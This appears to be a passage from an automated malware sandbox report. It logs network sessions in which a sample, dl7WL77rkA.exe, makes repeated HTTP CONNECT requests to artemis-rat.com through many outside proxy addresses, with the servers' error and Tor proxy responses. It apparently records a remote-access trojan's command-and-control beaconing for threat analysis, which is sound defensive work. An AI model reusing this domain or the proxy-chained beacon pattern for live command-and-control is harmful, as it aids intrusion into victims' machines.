                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1069192.168.2.552897104.27.26.29803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.040961027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.195732117 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1070192.168.2.552824162.55.87.4855663876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.043464899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.382395029 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1071192.168.2.552819223.215.177.22880893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.043466091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.565848112 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1072192.168.2.5528181.15.62.1256783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.043894053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1073192.168.2.552801106.14.124.29813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.056093931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.391264915 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1074192.168.2.55289238.54.101.25431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.058655977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.241142988 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1075192.168.2.55298943.153.52.1704433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.064790964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1076192.168.2.552825159.223.71.71592433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.066046000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806338072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.939340115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.014879942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.202095032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.311523914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.405203104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1077192.168.2.55300843.153.52.1704433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.074038029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1078192.168.2.55300943.153.52.1704433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.076236010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1079192.168.2.552934185.162.228.170803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.076240063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.232664108 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1080192.168.2.552923162.159.242.252803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.076555014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.239352942 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1081192.168.2.55301043.153.52.1704433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.077754021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1082192.168.2.55292550.63.12.33507813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.080882072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.635445118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.217727900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.311459064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405622959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.487530947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.608329058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.905105114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1083192.168.2.552886162.241.158.204317943876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.081010103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
